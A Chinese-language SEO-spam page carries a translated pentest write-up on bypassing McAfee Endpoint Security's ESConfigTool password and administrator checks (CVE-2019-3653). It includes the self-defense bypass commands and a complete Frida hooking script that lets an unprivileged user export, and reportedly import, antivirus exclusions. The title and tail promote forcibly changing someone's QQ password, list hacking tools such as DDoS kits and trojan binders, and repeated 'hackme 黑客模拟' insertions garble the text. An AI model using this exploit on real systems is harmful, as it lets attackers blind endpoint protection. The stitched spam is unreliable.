强制改动另一方qq密码手机软件-怎样绕过McAfee安全防护体制
在以前的渗透测试中,在我们遇到McAfee Virus Scan Enterprise(VSE)时都是会会心一笑,那时候要是简易查看注册表文件,就能了解管理人员建立的扫描仪例外项。
殊不知在此次渗透测试中,状况略微有点儿繁杂,由于总体目标应用的是McAfee Endpoint Security。如今McAfee早已已不将扫描仪例外信息以密文储存在某一部位,我们无法轻轻松松载入这种信息。
那麼如今大家该出路在哪里呢?
文中详细介绍了我如何使hackme *** 黑客仿真模拟用McAfee专用工具来绕过McAfee Endpoint Security商品。
0x01 ESConfigTool
McAfee Endpoint Security商品在安裝的时候会附加名叫“ESConfigTool”的一个程序流程,该程序流程能够用于导入导出环境变量,详尽使用 *** 可参照这里文本文档。
为了更好地获得McAfee Endpoint Security的配备信息,大家必须考虑以下标准:
解锁密码
管hackme *** 黑客仿真模拟理员管理权限
殊不知大家都沒有把握这种标准。
我下载了使用版的McAfee Endpoint Security,想进一步科学研究一下。
0x02 逆向分析
如今事儿刚开始有点儿繁杂,我还在反向分hackme *** 黑客仿真模拟析层面缺乏经验,与毛猴子一样,只有碰碰运气。
因而,使我们能够重新开始,做一下试验。我建立了以下3个例外新项目:
C:\\Windows\\Temp\\
*mimikatz.exe
C:\\TotallyLegit\\
应用登陆密码 *** 来维护这种设定,登陆密码为starwars。
如今开启管理人员命令提示符,看可否获取这种设定信息。
Microsoft Windows[Version 10.0.16299.15]
(c) hackme *** 黑客仿真模拟 2017 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>"C:\\Program Files\\McAfee\\Endpoint Security\\Endpoint Security Platform\\ESConfigTool.exe" /export C:\\Export.xml /module TP /unlock starwars /plaintext
Command hackme *** 黑客仿真模拟 executed successfully. Please refer to Endpoint Security logs for details
C:\\Windows\\system32>
开启形成的XML,看是不是能寻找大家的例外项:
<EXCLUSION_ITEMS>
<EXCLUSION_ITEM>
<EXCLUSION_BY_NAME_OR_LOCATION>C:\\Windows\\hackme *** 黑客仿真模拟Temp\\</EXCLUSION_BY_NAME_OR_LOCATION>
<EXCLUSION_FILE_TYPE />
<EXCLUSION_BY_FILE_AGE>0</EXCLUSION_BY_FILE_AGE>
<EXCLUSION_TYPE>3</EXCLUSION_TYPE>
<EXCLUSION_EXCLUDE_hackme *** 黑客仿真模拟SUBFOLDERS>1</EXCLUSION_EXCLUDE_SUBFOLDERS>
<EXCLUSION_ON_READ>1</EXCLUSION_ON_READ>
<EXCLUSION_ON_WRITE>1</EXCLUSION_ON_WRITE>
<EXCLUSION_SOURCE>0</EXCLUSION_SOURCE>
hackme *** 黑客仿真模拟 </EXCLUSION_ITEM>
<EXCLUSION_ITEM>
<EXCLUSION_BY_NAME_OR_LOCATION>**\\*mimikatz.exe</EXCLUSION_BY_NAME_OR_LOCATION>
<EXCLUSION_FILE_TYPE />
<EXCLUSION_BY_FILE_AGE>0</hackme *** 黑客仿真模拟EXCLUSION_BY_FILE_AGE>
<EXCLUSION_TYPE>3</EXCLUSION_TYPE>
<EXCLUSION_EXCLUDE_SUBFOLDERS>0</EXCLUSION_EXCLUDE_SUBFOLDERS>
<EXCLUSION_ON_READ>1</EXCLUSION_ON_READ>
hackme *** 黑客仿真模拟 <EXCLUSION_ON_WRITE>1</EXCLUSION_ON_WRITE>
<EXCLUSION_SOURCE>0</EXCLUSION_SOURCE>
</EXCLUSION_ITEM>
<EXCLUSION_ITEM>
<EXCLUSION_BY_NAME_OR_LOCATION>C:\\TotallyLegit\\</EXCLUSION_BY_NAME_OR_LOCATION>
hackme *** 黑客仿真模拟 <EXCLUSION_FILE_TYPE />
<EXCLUSION_BY_FILE_AGE>0</EXCLUSION_BY_FILE_AGE>
<EXCLUSION_TYPE>3</EXCLUSION_TYPE>
<EXCLUSION_EXCLUDE_SUBFOLDERS>hackme *** 黑客仿真模拟1</EXCLUSION_EXCLUDE_SUBFOLDERS>
<EXCLUSION_ON_READ>1</EXCLUSION_ON_READ>
<EXCLUSION_ON_WRITE>1</EXCLUSION_ON_WRITE>
<EXCLUSION_SOURCE>0</EXCLUSION_SOURCE>
hackme *** 黑客仿真模拟 </EXCLUSION_ITEM>
</EXCLUSION_ITEMS>
很好!但它是大家应用访问权限、相互配合恰当的登陆密码才获得的結果。我们可以attach程序调试,看一下后台管理的工作内容。
0x03 防范意识
一般状况下,attach程序调试是非常简单的一个全过程,只必须开启程序调试、挑选目标程序、再加上一些命令行参数就可以。殊不知因为大家应对的是一款安全性解决 *** ,因而会遭遇一些阻拦。这儿有一个较为大的难题,McAfee的部件都受该商品的“防范意识”作用的安全防护。如果我们试着attach程序调试,便会见到“Debugging hackme *** 黑客仿真模拟 stopped”不正确信息,McAfee也会在Self Defense日志文件中纪录这种实际操作。
12/10/2019 12:47hackme *** 黑客仿真模拟:09 mfeesp(2204.6392) <SYSTEM> ApBl.SP.Activity: DESKTOP-DNUK2R5\\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule "Core Protection - Protect McAfee processes from unauthorized access and termination", and was hackme *** 黑客仿真模拟 blocked. For information about how to respond to this event, see KB85494.
12/10/2019 12:47:09 mfeesp(2204.5404) <SYSTEM> ApBl.SP.Activity: DESKTOP-DNUK2R5\\admin ran X64DBG.EXE, which attempted to access ESCONFIGTOOL.EXE, violating the rule "Core hackme *** 黑客仿真模拟 Protection - Protect McAfee processes from unauthorized access and termination", and was blocked. For information about how to respond to this event, see KB85494.
历经一些试着和不正确后,我找到了可以绕过Self Defense体制的一种方式,也就是说白了的“Super 1337, z3r0 d4y, APT-style hackme *** 黑客仿真模拟 nation state”技术性(汉语翻译回来便是diao炸天技术性)。可以看以下实际操作:
Microsoft Windows[Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\\Users\\admin>mkdir \ emp
C:\\Users\\admin>cd \ emp
C:\ emp>copy "C:\\Program h ackme黑客模拟 Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe" .
1 file(s) copied.
C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\blframework.dll" .
1 file(s) hackme黑客模拟 copied.
C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\EpSecApiLib.dll" .
1 file(s) copied.
C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security hackme黑客模拟 Platform\McVariantExport.dll" .
1 file(s) copied.
C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\LogLib.dll" .
1 file(s) copied.
C:\temp>
就这么简单?的确如此!我们甚至不需要管理员权限hackme黑客模拟。任何普通用户都可以执行该操作。现在我们可以attach调试器,开始分析:
那现在该怎么继续处理呢?
0x04 绕过密码检查
来看一下当使用错误密码时会出现哪些情况。这里可能会出现一些字符串,帮hackme黑客模拟我们定位:
C:\Windows\system32>"C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe" /export C:\Export.xml /module TP /unlock startrek /plaintext
There were some errors while executing command. Please refer hackme黑客模拟 to Endpoint Security logs for details
C:\Windows\system32>
看上去错误信息比较空泛,但McAfee的日志文件可以提供更多的信息:
10/12/2019 01:11:46.400 PM ESConfigTool(5476.8840) <admin> ESConfigTool.ESConfigTool.Error (ImportExportUtil.cpp:677): Failed to unlock hackme黑客模拟 client settings with user supplied password, TriggerAction failed
我们可以在调试器中搜索字符串,判断该错误的位置。
非常好,如果在此处设置断点,再次运行就可以触发断点。如果我hackme黑客模拟们分析触发断点前的逻辑,可以看到目标调用了一个BLInvokeMethod函数,然后执行了某次跳转,但我们在输错密码时并不会执行该跳转:
此时我们需要做一些选择:
1、深入分析密码检查函数,判断函数逻辑,然后尝试破解密码;
2、让密码函数顺利运行,修改函数返回值。
由于我的懒惰天性,我选择第2种方案。当输入错误密码时,密码检查函数会在RAX寄存器中存储一个错误值:
如果提供正确的密码,RAX寄存器的值为0:
因此,如果我们提供错误的密码,在密码检查函数上设置断点,然后将RAX寄存器值改为0会怎么样?来试一下。
显然非常顺利。
事实证明密码检查逻辑只由该工具本身来负责,我们并不需要解密或者导出实际的配置。接下来让我们解决另一个问题。
0x05 hackme黑客模拟 绕过管理员检查
虽然输入错误密码时我们能看到比较清晰的错误提示,但如果没有以管理员权限运行该工具,我们只能看到帮助信息:
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\user>"C:\Program Files\McAfee\Endpoint Security\Endpoint hackme黑客模拟 Security Platform\ESConfigTool.exe" /export C:\temp\Export.xml /module TP /unlock starwars /plaintext
Description:
Endpoint security configuration tool for exporting and importing policy configuration. User needs administrator privileges hackme黑客模拟 to run this utility. Utility needs password if the client interface is password protected. File supplied for import must be an encrypted file.
USAGE:
ESConfigTool.exe /export <filename> [/module <TP|FW|WC|ESP> ] [/unlock <password> hackme黑客模拟 ] [/plaintext ]
ESConfigTool.exe /import <filename> [/module <TP|FW|WC|ESP> ] [/unlock <password> ] [/policyname <name> ]
ESConfigTool.exe /help
C:\Users\user>
日志里面也没有信息。
那么我们如何知道hackme黑客模拟管理员检查的具体机制?我们可以以普通用户权限运行调试器来分析一下,此时发现目标会调用一个函数,在返回值上执行字符串比较操作,如果返回代码不等于0,则会调用exit。
如果跟进该函数,最终可以找到一个函数:AllocateAndInitializeSid。这些过程都比较蛋疼,不值得专门花时间逆向分析。我们可以试一下偷懒的 *** ,直接修改返回值。
进一步分析,我们发现返回值检查逻辑位于此处:
这里我们直接把返回值设置为0:
结果依然非常顺利!
现在我们可以在受hackme黑客模拟限权限且不知道正确密码的情况下,从McAfee Endpoint Security中导出配置信息。
0x06 自动化操作
目前的进展非常顺利,然而如果每次都需要attach调试器,手动修改返回值,显然是非常痛苦的操作。幸运的是,Frida可以提供援手。如果大家不熟悉Frida,建议了解一下。该工具可以帮我们做很多操作,比如hook函数、修改返回值等,我们只需要了解JavaScript就能完成这些任务。
但是我们如何将Frida注入McAfee呢?非常简单hackme黑客模拟,使用frida-server即可。我们可以在运行McAfee的主机上打开该工具,然后使用Python发起连接。
McAfee目标主机:
Microsoft Windows [Version 10.0.16299.15]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Users\admin>cd hackme黑客模拟 \temp
C:\temp>frida-server-12.7.9-windows-x86_64.exe
Python主机:
Python 3.6.7 (default, Oct 22 2018, 11:32:17)
[GCC 8.2.0] on linux
Type "help", hackme黑客模拟 "copyright", "credits" or "license" for more information.
>>> import frida
>>> devmgr = frida.get_device_manager()
>>> devmgr.add_remote_device('192.168.31.150')
Device(id="tcp@192.168.31.150", hackme黑客模拟 name="192.168.31.150", type='remote')
>>> rdev = frida.get_device('tcp@192.168.31.150')
>>> args = [
... 'ESConfigTool.exe',
... '/export',
... 'frida-export.xml',
... hackme黑客模拟 '/module',
... 'ESP',
... '/unlock',
... 'startrek',
... '/plaintext'
... ]
>>> pid = rdev.spawn(args)
>>> session = rdev.attach(pid)
>>> session
Session(pid=1hackme黑客模拟1168)
成功连接,且ESConfigTool.exe处于运行状态!
现在我们可以将JavaScript代码注入ESConfigTool进程中。
0x07 Frida脚本
这里hackme黑客模拟我就不详细介绍如何创建该脚本,本文已经介绍了足够多的背景信息,这里我直接给出完整脚本:
const configBase = Module.findBaseAddress('ESConfigTool.exe');
//const adminCheck = configBase.add(0x5240); //32
const adminCheck = configBase.add(0x5f30); //64
const BLInvokeMethod = hackme黑客模拟 Module.findExportByName('blframework.dll','BLInvokeMethod')
console.log('[-] Base address is:',configBase);
console.log('[-] Admin check is:',adminCheck);
console.log('[-] BLInvokeMethod:',BLInvokeMethod);
Interceptor.attach(adminCheck, {
hackme黑客模拟onEnter: function (args) {
console.log('[+] Hooked admin check function');
},
onLeave: function (retval) {
console.log('[+] Returning true for admin check');
retval.replace(1);
}
});
hackme黑客模拟Interceptor.attach(BLInvokeMethod, {
onEnter: function (args) {
console.log('[+] Hooked BLInvokeMethod function');
},
onLeave: function (retval) {
console.log('[+] Patching password check function');
hackme黑客模拟 retval.replace(0x0);
}
});
脚本的逻辑与我们在调试器中手动执行的逻辑一致,会修改返回值。让我们注入脚本,观察是否能成功执行:
>>> script = """
... const configBase = Module.findBaseAddress('ESConfigTool.exe');
... //const adminCheck = configBase.add(0x5240); hackme黑客模拟 //32
... const adminCheck = configBase.add(0x5f30); //64
... const BLInvokeMethod = Module.findExportByName('blframework.dll','BLInvokeMethod')
...
... console.log('[-] Base address is:',configBase);
... console.log('[hackme黑客模拟-] Admin check is:',adminCheck);
... console.log('[-] BLInvokeMethod:',BLInvokeMethod);
...
... Interceptor.attach(adminCheck, {
... onEnter: function (args) {
... console.log('[+] Hooked admin check function');
...hackme黑客模拟 },
... onLeave: function (retval) {
... console.log('[+] Returning true for admin check');
... retval.replace(1);
... }
... });
...
... Interceptor.attach(BLInvokeMethod, {
... onEnter: hackme黑客模拟 function (args) {
... console.log('[+] Hooked BLInvokeMethod function');
... },
... onLeave: function (retval) {
... console.log('[+] Patching password check function');
... retval.replace(0x0);
... }
hackme黑客模拟... });
...
... """
>>> session.create_script(script).load()
[-] Base address is: 0x7ff73ed30000
[-] Admin check is: 0x7ff73ed35f30
[-] BLInvokeMethod: 0x7ffa4d759730
>>> hackme黑客模拟 rdev.resume(pid)
>>> [+] Hooked admin check function
[+] Returning true for admin check
[+] Hooked BLInvokeMethod function
[+] Patching password check function
>>>
事实证明非常顺利:
虽然命令提示符中显示的是admin用户,但我并没有允许UAC弹窗。请相信我普通用户就能完成该任务。
0x08 后续操作
我们最终得到了扫描例外项目信息。由于该过程通过TCP连接完成,因此我也成功通过Cobalt Strike beacon完成该操作。
hackme黑客模拟即使本文中我们只分析了如何导出该信息,但其实我们也可以导入配置文件。这意味着我们可以添加自己的例外项,修改其他设置,甚至删除密码等。
这里要稍微提一下/plaintext参数,这个参数有点“神经刀”。有时候能正常工作,有时候却不行。可能不同的版本性需要使用不同的函数偏移量?我并不确定。这里我不想进一步研究,因为即使McAfee向我们提供了不加此参数的加密配置,我们也可hackme黑客模拟以将加密配置直接载入试用版产品中。
另外,配置信息究竟如何加密?这是另一个话题。当McAfee PSIRT(Product Security Incident Response Team)修复该问题后,我会提供一些信息。
0x09 缓解机制
McAfee PSIRT公布了一个安全公告,修复了该问题,分配的漏洞编号为CVE-2019-3653。这里我并没有测试漏洞是否已被修复,毕竟自己太懒了。
我还有另一个想法:即使官方修复了ESConfigTool中的问题,我们能否使用早期版本的工具,在新版的McAfee hackme黑客模拟 Endpoint Protection上继续利用?这个工作留给大家完成,我上传了一个python PoC脚本,欢迎大家尝试。
本文翻译自 dmaasland.github.io, 原文链接 。如若转载请注明出处。
译文声明
本文是翻译文章,文章原作者dmaasland,文章来源:dmaasland.github.io
原文地址:https://dmaasland.github.io/posts/mcafee.html
译文仅供参考,具体内容表达以及含义原文为准
有三方面的原因:1. *** 未设置密保,密码容易被窃取;2. *** 电脑中了木马病毒,账号再次被盗;3.账号信息被泄露,所加好友中有陌生人(可能是盗号人),账号被。强行修改对方qq密hackme黑客模拟码软件
换了手机号黑客还能找到你吗想问一下找到了吗?找了很久找不到?如果找到了想问一下小说名称,谢谢病态娇宠,女主重生男主爱了女主两世超甜的推荐无理头奇遇记 作者: 阿渥忑 简介: 这个世界没有不可能发生的事,只有你想不到发生的事, 期待着这之中的无理头千千万万。
强行修改对方qq密码软件小黑是黑客,小白是菜鸟了,或者是 *** 安全工程师!这个看在什么位置了,你可以去看看雷公黑客教程里面有很多技术的!
套用现在的一些热点词,就是用互联网思维做营销。或者说是以数据/工程师的方式去驱动用户/产hackme黑客模拟品的增长我个人总结了精简版,想要的可以找我从技术层面来说黑客没严格的标准,擅长写个病毒,入侵个网站,拿个服务器,用社工骗个人都会自称黑客,外行喜欢看热闹,新闻记者喜欢吹嘘,新人更加别人说什么。
抓鸡肉鸡红娘鸽子33894899HscanDDoSSSPortx-scan嗅探监听SQL溢出端口扫描工具,嗅探工具,木马捆绑器,黑客字典等等学黑客建议先学编程(推荐Vb实用入门快好学方便攻击windows系统),然后学习黑客工具,最后自己学着编病毒程序,强行修改对方qq密码软件
知道一个人的真实姓名怎么找到这hackme黑客模拟个人的 *** 的解决办法:你可以通过 *** 校友来找找看如果你知道他是那么学校的可以去校友。
强行修改对方qq密码软件因为黑客很多软件都有后门程序,不是特别懂,不建议用,即使是用,可以在虚拟机下使用。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。